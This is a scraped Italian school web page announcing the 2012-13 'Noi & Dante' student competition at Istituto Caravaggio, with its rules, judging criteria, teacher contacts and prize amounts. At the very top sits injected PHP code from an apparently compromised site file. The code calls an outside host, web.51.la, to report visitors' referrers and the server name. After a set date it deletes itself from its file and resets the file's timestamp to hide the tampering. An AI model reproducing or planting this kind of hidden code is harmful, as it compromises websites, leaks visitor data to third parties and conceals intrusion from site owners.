check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735873){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Dante
Get Adobe Flash player

Nuovo sito

nuovosito 1

Dante

Noi e Dante Alighieri

Concorso per gli studenti sul tema “Noi & Dante”

Borse di studio per gli alunni vincitori del concorso

Vincitori-del-concorso-NOI-

LOCANDINA-gialla

poster-venturi 1

 

Regolamento di partecipazione

 

Partecipanti: tutti gli alunni che frequentano l’Istituto Caravaggio nell’anno 2012- 13

Finalità. Professori e alunni si accosteranno insieme alla nostra più alta tradizione poetica per dimostrarne l’attualità attraverso la rielaborazione nei nuovi linguaggi artistici. Insieme saranno considerate le infinite possibilità di un “classico” indiscusso che, in quanto tale, si presta a nuove rivelazioni e continue reinvenzioni

Tema. La Divina Commedia costituisce un universo fantastico nel quale personaggi, tematiche, immagini continuano a vivere di una magica energia che contagia i lettori di tutte le età, in tutte le età e anche presso culture molto lontane dalla nostra.

Tu, studente del XXI secolo, hai dedicato tempo e impegno alla comprensione di alcuni brani del Poema; hai certamente sviluppato un tuo rapporto personale tra quei versi - scritti oltre settecento anni fa - e il tuo mondo.

 Ma proprio attraverso i nuovissimi strumenti di cui disponi, attraverso il tuo immaginario, formato in una cultura fortemente tecnologica e polisemica, proprio tu con un gesto creativo, puoi reinventare una nuova contestualizzazione dove alcuni temi/personaggi/episodi del mondo di Dante continueranno a vivere.

 Seleziona, quindi, i versi che ti hanno particolarmente colpito e falli rivivere attraverso una tua personale creazione. I tuoi docenti ti forniranno l’aiuto necessario.

 Scegli liberamente all’interno delle tre cantiche un brano o un tema che ha sollecitato la tua emozione e produci un elaborato riconducibile alle due seguenti sezioni:

 

A) linguaggio figurativo: un’immagine ottenuta con qualunque tecnica (olio, ceramica, grafica, collage ecc… ), o una scultura, o un video, o una foto, o un’istallazione ecc…

 

B) linguaggio verbale e/o musicale: un commento scritto, o un percorso critico, o un testo teatrale, o una traduzione, o una poesia, o una parodia, o una canzone, o un’intervista immaginaria, o un fumetto ecc…


Criteri di valutazione. Date le finalità espresse, la Commissione valuterà con particolare attenzione l’originalità dei lavori e la capacità di padroneggiare le tecniche utilizzate. In particolare saranno tenuti in massima considerazione:

 

a) coerenza progettuale (dall’ideazione all’esecuzione)

 

b) evidente attinenza con il passo o tema prescelto

 

c) pregnanza significativa del lavoro prodotto

 

 

Ruolo dei docenti. La progettazione può prevedere l’intervento concertato di materie diverse. Può essere concepita anche in relazione con la stesura della Tesina per gli Esami di Stato

 

Docenti di riferimento. Docente coordinatore generale è la prof. Maria Teresa Ciammaruconi ( Questo indirizzo e-mail è protetto dallo spam bot. Abilita Javascript per vederlo. , cell. 320.1923847)

 

Docenti referenti per ciascuna sede

 

nella sede di Oceano Indiano: prof. Donatella Erba

 

nella sede di via Argoli: prof. Virginia Properzi

 

nella sede di Odescalchi ,75: prof.Micaela Arcidiacono

 

nella sede di Odescalchi, 98: Prof. Adele Lotito

 

Tempi e modalità di consegna: gli elaborati dovranno essere consegnati al docente responsabile di sede entro e non oltre venerdì 10 maggio.

 

L’elaborato, corredato da un titolo, sarà accompagnato da una busta contenente il nome dell’autore, la classe di appartenenza e la dichiarazione che si tratta di una propria creazione.

 

Commissione giudicatrice. La giuria, presieduta dal Dirigente Scolastico, sarà composta da docenti di diverse aree disciplinari. Si riunirà nei giorni immediatamente successivi alla consegna per esaminare le prove messe a concorso e stabilire i vincitori. Il giudizio della Commissione è insindacabile.

 

Premi. Per ciascuna sezione sono previsti 3 borse di studio per un totale di 6 premi:

 

I premio, euro 700,00

 

II premio, euro 500,00

 

III premio euro 300,00

 

Eventuali altre segnalazioni.

 

La partecipazione al Concorso con un’opera premiata o segnalata sarà considerata titolo valido per l’attribuzione del credito formativo.

 

Premiazione. La premiazione concluderà il Convegno che si terrà entro il mese di maggio.

 

Convegno. Nel corso del Convegno tutti coloro che hanno dato vita al percorso di studio, alla comprensione e alla rielaborazione libera ma coerente della poesia del Poeta, alunni e docenti, si incontreranno con studiosi ed esperti che illustreranno alcune delle componenti dell’universo dantesco e come, nel corso dei secoli, il Poeta abbia fornito occasione per la produzione di nuove opere artistiche.